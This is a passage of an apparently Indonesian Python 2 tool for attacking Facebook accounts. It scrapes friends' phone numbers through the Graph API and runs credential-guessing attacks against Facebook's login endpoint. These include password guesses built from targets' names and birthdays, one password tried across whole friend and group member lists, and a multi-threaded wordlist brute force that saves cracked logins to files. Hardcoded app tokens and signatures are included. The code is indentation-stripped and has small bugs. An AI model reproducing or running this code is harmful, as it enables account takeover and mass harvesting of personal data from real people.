dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### NOMER FROM TEMAN #####
def hpfrom_teman():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
idt = raw_input("\033[1;91m[+] \033[1;92mInput ID friend \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;91m[!] Friend not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
r = requests.get('https://graph.facebook.com/'+idt+'/friends?access_token='+toket)
a = json.loads(r.text)
jalan('\033[1;91m[✺] \033[1;92mGet all friend number from friend \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/no_teman_from_teman.txt','w')
for i in a['data']:
x = requests.get("https://graph.facebook.com/"+i['id']+"?access_token="+toket)
z = json.loads(x.text)
try:
hpfromteman.append(z['mobile_phone'])
bz.write(z['mobile_phone'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(hpfromteman))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+z['mobile_phone']+" | "+z['name']+"\n"),;sys.stdout.flush();time.sleep(0.0001)
except KeyError:
pass
bz.close()
print 42*"\033[1;97m═"
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get number \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal Number \033[1;91m: \033[1;97m%s"%(len(hpfromteman))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/no_teman_from_teman.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### MENU HACK #####
def menu_hack():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;97m║--\033[1;91m> \033[1;92m1.\033[1;97m Mini Hack Facebook(\033[1;92mTarget\033[1;97m)"
print "\033[1;97m║--\033[1;91m> \033[1;92m2.\033[1;97m Multi Bruteforce Facebook"
print "\033[1;97m║--\033[1;91m> \033[1;92m3.\033[1;97m Super Multi Bruteforce Facebook"
print "\033[1;97m║--\033[1;91m> \033[1;92m4.\033[1;97m BruteForce(\033[1;92mTarget\033[1;97m)"
print "\033[1;97m║--\033[1;91m> \033[1;92m5.\033[1;97m Yahoo Checker"
print "\033[1;97m║--\033[1;91m> \033[1;91m0.\033[1;97m Back"
print "║"
hack_pilih()
#----pilih
def hack_pilih():
hack = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if hack=="":
print "\033[1;91m[!] Wrong input"
hack_pilih()
elif hack =="1":
mini()
elif hack =="2":
crack()
hasil()
elif hack =="3":
super()
elif hack =="4":
brute()
elif hack =="5":
menu_yahoo()
elif hack =="0":
menu()
else:
print "\033[1;91m[!] Wrong input"
hack_pilih()
##### MINI HF #####
def mini():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;97m[\033[1;91mINFO\033[1;97m] \033[1;91mThe target account must be friends\n with your account first!"
print 42*"\033[1;97m═"
try:
id = raw_input("\033[1;91m[+] \033[1;92mTarget ID \033[1;91m:\033[1;97m ")
jalan('\033[1;91m[✺] \033[1;92mWait a minute \033[1;97m...')
r = requests.get("https://graph.facebook.com/"+id+"?access_token="+toket)
a = json.loads(r.text)
print '\033[1;91m[➹] \033[1;92mName\033[1;97m : '+a['name']
jalan('\033[1;91m[+] \033[1;92mCheck \033[1;97m...')
time.sleep(2)
jalan('\033[1;91m[+] \033[1;92mOpen password \033[1;97m...')
time.sleep(2)
print 42*"\033[1;97m═"
pz1 = a['first_name']+'123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(id)+"&locale=en_US&password="+(pz1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
y = json.load(data)
if 'access_token' in y:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz1
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
if 'www.facebook.com' in y["error_msg"]:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz1
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
pz2 = a['first_name'] + '12345'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(id)+"&locale=en_US&password="+(pz2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
y = json.load(data)
if 'access_token' in y:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz2
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
if 'www.facebook.com' in y["error_msg"]:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz2
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
pz3 = a['last_name'] + '123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(id)+"&locale=en_US&password="+(pz3)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
y = json.load(data)
if 'access_token' in y:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz3
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
if 'www.facebook.com' in y["error_msg"]:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz3
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
lahir = a['birthday']
pz4 = lahir.replace('/', '')
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(id)+"&locale=en_US&password="+(pz4)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
y = json.load(data)
if 'access_token' in y:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz4
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
if 'www.facebook.com' in y["error_msg"]:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz4
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
lahirs = a['birthday']
gaz = lahirs.replace('/', '')
pz5 = a['first_name']+gaz
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(id)+"&locale=en_US&password="+(pz5)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
y = json.load(data)
if 'access_token' in y:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz5
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
if 'www.facebook.com' in y["error_msg"]:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz5
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
pz6 = "kontol123"
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(id)+"&locale=en_US&password="+(pz6)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
y = json.load(data)
if 'access_token' in y:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz6
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
if 'www.facebook.com' in y["error_msg"]:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz6
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
pz7 = "sayang123"
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(id)+"&locale=en_US&password="+(pz7)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
y = json.load(data)
if 'access_token' in y:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz7
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
if 'www.facebook.com' in y["error_msg"]:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz6
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
print "\033[1;91m[!] Sorry, failed to open the target password :("
print "\033[1;91m[!] try it another way."
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
except KeyError:
print "\033[1;91m[!] Terget not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
##### Multi Brute Force #####
##### CRACK ####
def crack():
global idlist,passw,file
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
idlist = raw_input('\033[1;91m[+] \033[1;92mFile ID \033[1;91m: \033[1;97m')
passw = raw_input('\033[1;91m[+] \033[1;92mPassword \033[1;91m: \033[1;97m')
try:
file = open((idlist), "r")
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
for x in range(40):
zedd = threading.Thread(target=scrak, args=())
zedd.start()
threads.append(zedd)
for zedd in threads:
zedd.join()
except IOError:
print ("\033[1;91m[!] File not found")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
def scrak():
global berhasil,cekpoint,gagal,back,up
try:
os.mkdir('out')
except OSError:
pass
try:
buka = open(idlist, "r")
up = buka.read().split()
while file:
username = file.readline().strip()
url = "https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(username)+"&locale=en_US&password="+(passw)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6"
data = urllib.urlopen(url)
mpsh = json.load(data)
if back == (len(up)):
break
if 'access_token' in mpsh:
bisa = open("out/mbf_ok.txt", "w")
bisa.write(username+"|"+passw+"\n")
bisa.close()
x = requests.get("https://graph.facebook.com/"+username+"?access_token="+mpsh['access_token'])
z = json.loads(x.text)
berhasil.append("\033[1;97m[ \033[1;92mOK✓\033[1;97m ] "+username+"|" +passw+" =>"+z['name'])
elif 'www.facebook.com' in mpsh["error_msg"]:
cek = open("out/mbf_cp.txt", "w")
cek.write(username+"|"+passw+"\n")
cek.close()
cekpoint.append("\033[1;97m[ \033[1;93mCP✚\033[1;97m ] "+username+"|" +passw)
else:
gagal.append(username)
back +=1
sys.stdout.write('\r\033[1;91m[\033[1;96m✸\033[1;91m] \033[1;92mCrack \033[1;91m:\033[1;97m '+str(back)+' \033[1;96m>\033[1;97m '+str(len(up))+' =>\033[1;92mLive\033[1;91m:\033[1;96m'+str(len(berhasil))+' \033[1;97m=>\033[1;93mCheck\033[1;91m:\033[1;96m'+str(len(cekpoint)));sys.stdout.flush()
except IOError:
print"\n\033[1;91m[!] Sleep"
time.sleep(1)
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
def hasil():
print
print 42*"\033[1;97m═"
###Berhasil
for b in berhasil:
print(b)
###CEK
for c in cekpoint:
print(c)
###Gagal
print 42*"\033[1;97m═"
print ("\033[31m[x] Failed \033[1;97m--> " + str(len(gagal)))
keluar()
############### SUPER MBF ################
def super():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;97m║--\033[1;91m> \033[1;92m1.\033[1;97m Crack with list friend"
print "\033[1;97m║--\033[1;91m> \033[1;92m2.\033[1;97m Crack from friend"
print "\033[1;97m║--\033[1;91m> \033[1;92m3.\033[1;97m Crack from member group"
print "\033[1;97m║--\033[1;91m> \033[1;91m0.\033[1;97m Back"
print "║"
pilih_super()
def pilih_super():
peak = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if peak =="":
print "\033[1;91m[!] Wrong input"
pilih_super()
elif peak =="1":
os.system('reset')
print logo
jalan('\033[1;91m[✺] \033[1;92mGet all friend id \033[1;97m...')
r = requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
elif peak =="2":
os.system('reset')
print logo
idt = raw_input("\033[1;91m[+] \033[1;92mInput ID friend \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;91m[!] Friend not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
super()
jalan('\033[1;91m[✺] \033[1;92mGet all id from friend \033[1;97m...')
r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+toket)
z = json.loads(r.text)
for i in z['data']:
id.append(i['id'])
elif peak =="3":
os.system('reset')
print logo
idg=raw_input('\033[1;91m[+] \033[1;92mInput ID group \033[1;91m:\033[1;97m ')
try:
r=requests.get('https://graph.facebook.com/group/?id='+idg+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;91m[!] Group not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
super()
jalan('\033[1;91m[✺] \033[1;92mGet group member id \033[1;97m...')
re=requests.get('https://graph.facebook.com/'+idg+'/members?fields=name,id&limit=999999999&access_token='+toket)
s=json.loads(re.text)
for p in s['data']:
id.append(p['id'])
elif peak =="0":
menu_hack()
else:
print "\033[1;91m[!] Wrong input"
pilih_super()
print "\033[1;91m[+] \033[1;92mTotal ID \033[1;91m: \033[1;97m"+str(len(id))
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;91m[\033[1;96m✸\033[1;91m] \033[1;92mCrack \033[1;97m"+o),;sys.stdout.flush();time.sleep(1)
print
print 42*"\033[1;97m═"
##### crack #####
def main(arg):
global cekpoint,oks
user = arg
try:
os.mkdir('out')
except OSError:
pass
try:
#Pass1
a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
b = json.loads(a.text)
pass1 = b['first_name']+'123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print("\033[1;97m[ \033[1;92mOK✓\033[1;97m ] "+user+ " Password " +pass1+" =>"+z['name'])
oks.append(user+pass1)
else:
if 'www.facebook.com' in q["error_msg"]:
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass1+"\n")
cek.close()
cekpoint.append(user+pass1)
else:
#Pass2
pass2 = b['first_name']+'12345'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print("\033[1;97m[ \033[1;92mOK✓\033[1;97m ] "+user+ " Password " +pass2+" =>"+z['name'])
oks.append(user+pass2)
else:
if 'www.facebook.com' in q["error_msg"]:
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass2+"\n")
cek.close()
cekpoint.append(user+pass2)
else:
#Pass3
pass3 = b['last_name'] + '123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass3)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print("\033[1;97m[ \033[1;92mOK✓\033[1;97m ] "+user+ " Password " +pass3+" =>"+z['name'])
oks.append(user+pass3)
else:
if 'www.facebook.com' in q["error_msg"]:
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass3+"\n")
cek.close()
cekpoint.append(user+pass3)
else:
#Pass4
lahir = b['birthday']
pass4 = lahir.replace('/', '')
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass4)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print("\033[1;97m[ \033[1;92mOK✓\033[1;97m ] "+user+ " Password " +pass4+" =>"+z['name'])
oks.append(user+pass4)
else:
if 'www.facebook.com' in q["error_msg"]:
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass4+"\n")
cek.close()
cekpoint.append(user+pass4)
else:
#Pass5
pass5 = "sayang123"
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass5)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print("\033[1;97m[ \033[1;92mOK✓\033[1;97m ] "+user+ " Password " +pass5+" =>"+z['name'])
oks.append(user+pass5)
else:
if 'www.facebook.com' in q["error_msg"]:
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass5+"\n")
cek.close()
cekpoint.append(user+pass5)
else:
#Pass6
pass6 = "kontol123"
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass6)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print("\033[1;97m[ \033[1;92mOK✓\033[1;97m ] "+user+ " Password " +pass6+" =>"+z['name'])
oks.append(user+pass6)
else:
if 'www.facebook.com' in q["error_msg"]:
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass6+"\n")
cek.close()
cekpoint.append(user+pass6)
else:
#Pass7
a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
b = json.loads(a.text)
pass8 = b['first_name']+'doraemon12345'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass7)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print("\033[1;97m[ \033[1;92mOK✓\033[1;97m ] "+user+ " Password " +pass7+" =>"+['name'])
oks.append(user+pass7)
else:
if 'www.facebook.com' in q["error_msg"]:
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass7+"\n")
cek.close()
cekpoint.append(user+pass7)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print 42*"\033[1;97m═"
print '\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mDone \033[1;97m....'
print"\033[1;91m[+] \033[1;92mTotal OK/CP \033[1;91m: \033[1;92m"+str(len(oks))+"\033[1;97m/\033[1;93m"+str(len(cekpoint))
print("\033[1;91m[+] \033[1;92mCP File saved \033[1;91m: \033[1;97mout/super_cp.txt")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
super()
######################################################
##### BRUTE FORCE #####
def brute():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
try:
email = raw_input("\033[1;91m[+] \033[1;92mID\033[1;97m/\033[1;92mEmail\033[1;97m/\033[1;92mHp \033[1;97mTarget \033[1;91m:\033[1;97m ")
passw = raw_input("\033[1;91m[+] \033[1;92mWordlist \033[1;97mext(list.txt) \033[1;91m: \033[1;97m")
total = open(passw,"r")
total = total.readlines()
print 42*"\033[1;97m═"
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mTarget \033[1;91m:\033[1;97m "+email
print "\033[1;91m[+] \033[1;92mTotal\033[1;96m "+str(len(total))+" \033[1;92mPassword"
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
sandi = open(passw,"r")
for pw in sandi:
try:
pw = pw.replace("\n","")
sys.stdout.write("\r\033[1;91m[\033[1;96m✸\033[1;91m] \033[1;92mCrack \033[1;91m: \033[1;97m"+pw)
sys.stdout.flush()
data = requests.get("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(email)+"&locale=en_US&password="+(pw)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
dapat = open("Brute.txt", "w")
dapat.write(email+" | "+pw+"\n")
dapat.close()
print "\n\033[1;91m[+] \033[1;92mFound"
print 42*"\033[1;97m═"
print("\033[1;91m[➹] \033[1;92mUsername \033[1;91m:\033[1;97m "+email)
print("\033[1;91m[➹] \033[1;92mPassword \033[1;91m:\033[1;97m "+pw)
keluar()
elif 'www.facebook.com' in mpsh["error_msg"]:
ceks = open("Brutecekpoint.txt", "w")
ceks.write(email+" | "+pw+"\n")
ceks.close()
print "\n\033[1;91m[+] \033[1;92mFound"
print 42*"\033[1;97m═"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print("\033[1;91m[➹] \033[1;92mUsername \033[1;91m:\033[1;97m "+email)
print("\033[1;91m[➹] \033[1;92mPassword \033[1;91m:\033[1;97m "+pw)
keluar()
except requests.exceptions.ConnectionError:
print"\033[1;91m[!] Connection Error"
time.sleep(1)
except IOError:
print ("\033[1;91m[!] File not found")
tanyaw()
def tanyaw():
why = raw_input("\033[1;91m[?] \033[1;92mCreate wordlist ? \033[1;92m[y/n]\033[1;91m:\033[1;97m ")
if why =="":
print "\033[1;91m[!] Wrong"
tanyaw()
elif why =="y":
wordlist()
elif why =="Y":
wordlist()
elif why =="n":
menu_hack()
elif why =="N":
menu_hack()
else:
print "\033[1;91m[!] Wrong"
tanyaw()
##### YAHOO CHECKER #####
#---------------------------------------------------#
def menu_yahoo():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;97m║--\033[1;91m> \033[1;92m1.\033[1;97m With list friend"
print "\033[1;97m║--\033[1;91m> \033[1;92m2.\033[1;97m Clone from friend"
print "\033[1;97m║--\033[1;91m> \033[1;92m3.\033[1;97m Clone from member group"
print "\033[1;97m║--\033[1;91m> \033[1;92m4.\033[1;97m Using file"
print "\033[1;97m║--\033[1;91m> \033[1;91m0.\033[1;97m Back"
print "║"
yahoo_pilih()
#----pilih
def yahoo_pilih():
go = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if go =="":
print "\033[1;91m[!] Wrong"
yahoo_pilih()
elif go =="1":
yahoofriends()
elif go =="2":
yahoofromfriends()
elif go =="3":
yahoomember()
elif go =="4":
yahoolist()
elif go =="0":
menu_hack()
else:
print "\033[1;91m[!] Wrong"
yahoo_pilih()
##### LIST FRIEND #####
def yahoofriends():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
